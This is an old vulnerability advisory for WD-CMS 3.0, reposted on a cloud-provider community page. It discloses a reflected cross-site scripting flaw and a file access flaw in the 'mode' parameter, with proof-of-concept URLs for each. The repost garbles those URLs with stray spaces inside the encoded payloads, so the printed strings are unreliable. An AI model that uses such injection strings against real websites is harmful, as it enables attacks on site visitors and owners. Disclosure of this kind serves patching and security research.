WD-CMS 3.0 Multiple Vulnerabilities

Source: Internet
Author: User

# Exploit Title: WD-CMS 3.0 Multiple Vulnerabilities

# Date: December 31st, 2009

# Author: Sora

# Software Link: http://www.webdiamond.net/cms.html

# Version: 3.0

# Tested on: Windows Vista and Linux (Backtrack 3)

---------------------------------------------------------------

> WD-CMS 3.0 Multiple Vulnerabilities

> Author: Sora

> Contact: vhr95zw [at] hotmail [dot] com

> Website: http://greyhathackers.wordpress.com/

--------------------------------------------------

# Program Description:

Based on a flexible PHP architecture, Web Diamond has developed a 100% browser-based database-driven Content Management System (CMS ), which allows users to maintain full control of their website without any technical knowledge of programming by using a simple user friendly admin panel. the main benefit and the flexible strength of our CMS is its ability to separate design, structure and content. each area of the site can be recreated and adjusted independent of the other areas.

Key features include:

1. User friendly secure admin interface

2. Access levels

3. Powerful File Manager

4. Multi ages

5. Dynamic templates

6. Search engine friendly

7. Site tools

8. Add-on modules

# Vulnerability Description:

The CMS named WD-CMS developed by Web Diamond LTD has multiple vulnerabilities.

Vulnerabilities: XSS and remote file access.

Http://www.site.com/index.php? L = eng & mode = % 3 Cscript % 3 Ealert % 28% 22XSS % 20by % 20 Sora % 22% 29% 3C/script % 3E

# Code/Proof of Concept (PoC ):

XSS Proof of Concept:

Http://www.site.com/index.php? L = eng & mode = % 3 Cscript % 3 Ealert % 28% 22XSS % 20by % 20 Sora % 22% 29% 3C/script % 3E

Remote File Access Proof of Concept:

Http://www.site.com/index.php? L = eng & mode =./index (as it adds. php at the end)

# Greetz:

Bw0mp, Popc0rn, Xermes, T3eS, Timeb0mb, [H] aruhiSuzumiya, Revelation, and Max Mafiotu!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.